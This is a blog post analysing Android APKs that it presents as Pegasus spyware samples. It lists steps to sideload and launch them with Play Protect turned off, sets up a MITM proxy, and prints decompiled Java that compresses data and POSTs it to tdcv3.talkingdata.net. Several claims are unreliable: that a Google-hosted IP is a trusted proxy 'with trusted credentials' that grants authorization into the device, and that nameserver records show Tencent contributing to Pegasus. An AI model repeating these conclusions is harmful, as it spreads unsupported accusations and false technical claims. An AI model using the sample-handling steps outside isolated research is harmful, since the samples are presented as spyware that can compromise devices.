Pegasus Spyware — Untold — Chinese Engineering — Samples 1 & 2

Jonathan Scott
9 min readDec 19, 2021

--

A Short Background

July 28th, 2021 I uploaded 4 decompiled Pegasus Spyware samples provided by VX-UNDERGROUND

website: https://www.vx-underground.org/
twitter: https://twitter.com/vxunderground

Pegasus Spyware Jonathan Scott Github Repository

I notice that this repository was getting a lot of attention, and it was being shared all over the world. To my surprise it ended up becoming a trending GitHub repository.

My intention was to bring awareness to the world in a way that had never been done before with Pegasus Spyware. I wanted researchers and engineers to study the code, and run the spyware on test devices so that we could all understand how this spyware functioned.

If we can understand it, we can develop solutions to stop, or at least impede it. I was aware of Pegasus Spyware for a while before @vxunderground released the samples, but even in July, 2021 many Americans had never heard of the spyware, and it would not be until November, 2021 that the US government would deem the spyware a risk to national security.

Source: https://appleinsider.com/articles/21/11/03/us-bans-nso-group-calls-pegasus-hacking-tool-national-security-risk

Reverse Engineering The Samples

I use Hopper Disassembler for MacOS to initially look through samples.

Source: https://www.hopperapp.com/

My typical quick process

A. Skim through the Hex View
B. Skim through the Pseudo Code
C. Skim through the ASM Procedures

I noticed something in the Hex View that caught my attention.

Ljava/lang/String

I immediately knew this was smali programming, and we had an Android app on our hands!

Smali Programming Example From Jonathan Scott Pegasus Spyware Repository

Smali Programming Language?

I won’t go into depth on this language right now, but for those that don’t know what smali is, or have never heard of smali here is a good explanation and a resource to learn more about it.

smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android’s Java VM implementation. The syntax is loosely based on Jasmin’s/dedexer’s syntax, and supports the full functionality of the dex format (annotations, debug info, line info, etc.)

Source: https://github.com/JesusFreke/smali

Creating Executable Spyware Samples

If i was going to put out samples that could be executable I needed to do the following, and disassembling the samples had already given me a big head start.

Step 1. Identify the code base these samples were written in

Step 2. Identify the operating system the samples can be installed on

Step 3. Identify the permissions needed to execute

Step 4. Install the samples on the correct operating system

Step 5. Capture data for validation

Analysis of The Chinese Code Written Into Android APKs

Ok so now that we have the basic overview out of the way let’s get into exactly why you are here.

The Pegasus Spyware Github repo has been on fire since July, 2021, but for as much as it has been shared, I have not seen one article about the elephant in the room.

WHY ARE THE APKS WRITTEN IN CHINESE?

There are countless articles about NSO Group being the creators of Pegasus. NSO Group is an Israeli company. Apple has recently filed a lawsuit against NSO Group “to curb the abuse of state-sponsored spyware.”

Source: https://www.apple.com/newsroom/2021/11/apple-sues-nso-group-to-curb-the-abuse-of-state-sponsored-spyware/

I find it strange how an Israeli company makes code comments in Chinese, creates App GUI’s with text written in Chinese, and no one has noticed this at all?

Steps To Install Pegasus Spyware Samples

1. Enable ADB on your android
2. Disable Android Protect
3. adb install sample1.apk
4. launch the apk, example

adb shell am start com.xxGameAssistant.pao/.SplashActivity

I installed all samples below on the following device:

Samsung Galaxy S8+ (SM-G955U)
Android OS: 9.0
Rooted: No
Google Play Protect: OFF

Sample 1

com.xxGameAssistant.pao

This is a screenshot of Sample 1 when you run it on an android.

Here is the sample1.apk screenshot translated from Chinese to English

Translation Source: https://translate.yandex.com/ocr

Well this is where things start to get interesting.

Let’s follow the sources.

We can see that we have a website ww.xxzhushou.com and a single duckduckgo search finds up the following Github Repository

Notice the icon in this Github repository, it’s the same icon that appears when you install sample 1.

When you look into more of the translated text you’re going to start making a lot of connections, but when you start making these connections you may experience a 连接超时 (timeout).

That was a bit of a situational programming humor by the way :)

Speaking of the “timeout,” when you look at sample 1 this is exactly what you will see in the code

./sample1/recompiled_java/sources/com/xxGameAssistant/pao/MainActivity.java

How To Launch The Sample & Note Worthy Discovery

Sample 2 —

com.binary.sms.receiver

In order for us to get the application launch string we will send the following command to the device

adb shell pm dump com.binary.sms.receiver

We should have an output that looks like this, and we can see

com.binary.sms.receiver/.SkeletonActivity

We can now launch the installed app by sending the following command

adb shell am start com.binary.sms.receiver/.SkeletonActivity

After launching this application you will be presented with the following GUI.

This sample is noteworthy because this is the first time we see Pegasus in a verbose manner. We can see Pegasus defined in the logger.java file and when we launch the sample through adb, we can see Pegasus in a verbose text out put through adb logcat

Note: a great way to find Chinese characters in a file system is by sending the following command .

pcre2grep -r -n '[^\x00-\x7f]' .

Chinese characters are usually hidden in unicode, and IDE’s don’t recognize the characters unless you change the detection.

Setting up the MITM on a compromised device

This process was annoying more than anything.

  1. Re-enable Google Play Protect
  2. Set a pin or pattern lock (you cant do step 3 without this)
  3. Install your MITM proxy .cer on the device
  4. Change your proxy settings in your current Wi-Fi config to point to the MITM server
  5. Re-install all the spyware
  6. now you can run
mitmproxy --intercept ip_of_spyware_phone

Pegasus Spyware Active Servers

Now that I had the MITM proxy running, I relaunched sample 2, and monitored the traffic.

I noticed a Post Request

POST http://tdcv3.talkingdata.net/g/dContent-Length: 344
Content-Type: application/unpack_chinar
Host: tdcv3.talkingdata.net
Connection: Keep-Alive

I thought…surely this isn’t a live server, and then I saw the server request data, and the the response, and then the details.

Pegasus Spyware Active Server Request
Pegasus Spyware Active Server Response
Pegasus Spyware Active Server Details

We can see that the resolved ip address is:

35.241.63.213

This ip address resolves to Google’s servers, but it is just a proxy setup to gain authorization into the android device without any issues.

This IP address is a trust IP address and already has trusted credentials.

When we run the command

curl -I tdcv3.talkingdata.net

We can see that there is a proxy service

Via: 1.1 google

I needed to find the TLD Name servers and trace the A records to get to the real origin.

dig tdcv3.talkingdata.net; <<>> DiG 9.10.6 <<>> tdcv3.talkingdata.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 37584
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 19
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;tdcv3.talkingdata.net. IN A
;; ANSWER SECTION:
tdcv3.talkingdata.net. 137 IN A 35.241.63.213
;; AUTHORITY SECTION:
talkingdata.net. 80790 IN NS ns4.dnsv4.com.
talkingdata.net. 80790 IN NS ns3.dnsv4.com.
;; ADDITIONAL SECTION:
ns3.dnsv4.com. 163623 IN A 162.14.25.247
ns3.dnsv4.com. 163623 IN A 52.74.43.18
ns3.dnsv4.com. 163623 IN A 59.36.120.145
ns3.dnsv4.com. 163623 IN A 61.129.8.140
ns3.dnsv4.com. 163623 IN A 61.151.180.49
ns3.dnsv4.com. 163623 IN A 129.211.176.242
ns3.dnsv4.com. 163623 IN A 162.14.24.250
ns4.dnsv4.com. 163623 IN A 162.14.24.247
ns4.dnsv4.com. 163623 IN A 162.14.25.250
ns4.dnsv4.com. 163623 IN A 183.192.164.116
ns4.dnsv4.com. 163623 IN A 223.166.151.14
ns4.dnsv4.com. 163623 IN A 223.166.151.15
ns4.dnsv4.com. 163623 IN A 52.74.43.18
ns4.dnsv4.com. 163623 IN A 61.151.180.50
ns4.dnsv4.com. 163623 IN A 125.39.45.245
ns4.dnsv4.com. 163623 IN A 162.14.18.188
ns3.dnsv4.com. 163623 IN AAAA 2402:4e00:1430:1102:0:9136:2b2d:9c7
ns4.dnsv4.com. 163623 IN AAAA 2402:4e00:1020:1264:0:9136:29c0:144e

The A Records

I wasn’t surprised to see that the A records resolving to Chinese servers, but my question is how involved is Tencent in this?

Feel free to reach out to them via their verified Twitter page and ask them why they’re contributing to the Pegasus Spyware Project.

@TencentGlobal

curl ipinfo.io/162.14.25.247
{
"ip": "162.14.25.247",
"anycast": true,
"city": "Haidian",
"region": "Beijing",
"country": "CN",
"loc": "39.9906,116.2887",
"org": "AS132203 Tencent Building, Kejizhongyi Avenue",
"timezone": "Asia/Shanghai",
"readme": "https://ipinfo.io/missingauth"
}
curl ipinfo.io/59.36.120.145
{
"ip": "59.36.120.145",
"hostname": "145.120.36.59.broad.dg.gd.dynamic.163data.com.cn",
"city": "Shenzhen",
"region": "Guangdong",
"country": "CN",
"loc": "22.5455,114.0683",
"org": "AS4134 CHINANET-BACKBONE",
"timezone": "Asia/Shanghai",
"readme": "https://ipinfo.io/missingauth"
}
curl ipinfo.io/61.129.8.140
{
"ip": "61.129.8.140",
"city": "Shanghai",
"region": "Shanghai",
"country": "CN",
"loc": "31.2222,121.4581",
"org": "AS4811 China Telecom (Group)",
"timezone": "Asia/Shanghai",
"readme": "https://ipinfo.io/missingauth"
}
curl ipinfo.io/61.151.180.49{
"ip": "61.151.180.49",
"hostname": "49.180.151.61.dial.xw.sh.dynamic.163data.com.cn",
"city": "Shanghai",
"region": "Shanghai",
"country": "CN",
"loc": "31.2222,121.4581",
"org": "AS4811 China Telecom (Group)",
"timezone": "Asia/Shanghai",
"readme": "https://ipinfo.io/missingauth"
}

More Validation

Not only is Sample 2calling back to

tdcv3.talkingdata.net/g/d

Sample 1 is calling back to the same endpoint

Source:

package com.tendcloud.tenddata;import java.io.ByteArrayOutputStream;
import java.util.zip.GZIPOutputStream;
import org.apache.http.HttpHost;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.conn.scheme.PlainSocketFactory;
import org.apache.http.conn.scheme.Scheme;
import org.apache.http.conn.scheme.SchemeRegistry;
import org.apache.http.entity.ByteArrayEntity;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.params.BasicHttpParams;
import org.apache.http.params.HttpConnectionParams;
public final class o {
private static final String a = "http://tdcv3.talkingdata.net";
private static final String b = "/g/d";
private static final int c = 60000;
private static final boolean d = true;
static DefaultHttpClient a() {
HttpHost d2;
int i = c;
boolean b2 = u.b();
new SchemeRegistry().register(new Scheme("http", PlainSocketFactory.getSocketFactory(), 80));
BasicHttpParams basicHttpParams = new BasicHttpParams();
HttpConnectionParams.setConnectionTimeout(basicHttpParams, b2 ? c : 120000);
if (!b2) {
i = 120000;
}
HttpConnectionParams.setSoTimeout(basicHttpParams, i);
DefaultHttpClient defaultHttpClient = new DefaultHttpClient(basicHttpParams);
if (!b2 && u.c() && (d2 = u.d()) != null) {
defaultHttpClient.getParams().setParameter("http.route.default-proxy", d2);
}
return defaultHttpClient;
}
static boolean a(ah ahVar) {
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
GZIPOutputStream gZIPOutputStream = new GZIPOutputStream(byteArrayOutputStream);
new p(gZIPOutputStream).a(ahVar);
gZIPOutputStream.finish();
gZIPOutputStream.flush();
return a(b, byteArrayOutputStream.toByteArray(), d);
}
static boolean a(String str, byte[] bArr, boolean z) {
DefaultHttpClient a2 = a();
try {
HttpPost httpPost = new HttpPost(a + str);
ByteArrayEntity byteArrayEntity = new ByteArrayEntity(bArr);
byteArrayEntity.setContentType("application/unpack_chinar");
httpPost.setEntity(byteArrayEntity);
if (a2.execute(httpPost).getStatusLine().getStatusCode() == 200) {
return d;
}
return false;
} catch (Exception e) {
}
}
}

Lastly, you can lookup this data for further validation on hybrid-analysis

I will be posting Samples 3–5 Deep Dive On Tuesday December 21st, 2021

Jonathan Scott

B.A. — Philosophy
M.S — Computer Science
PhD — Computer Science — Current Student

website: https://www.0hak.com/
github: https://github.com/jonathandata1/pegasus_spyware
twitter: https://twitter.com/jonathandata1

Keep The Red Bull Flowing https://www.buymeacoffee.com/jonathandata1

--

--

Jonathan Scott

Computer Scientist, MSCS. Researching mobile (malware/spyware/forensics/crypto)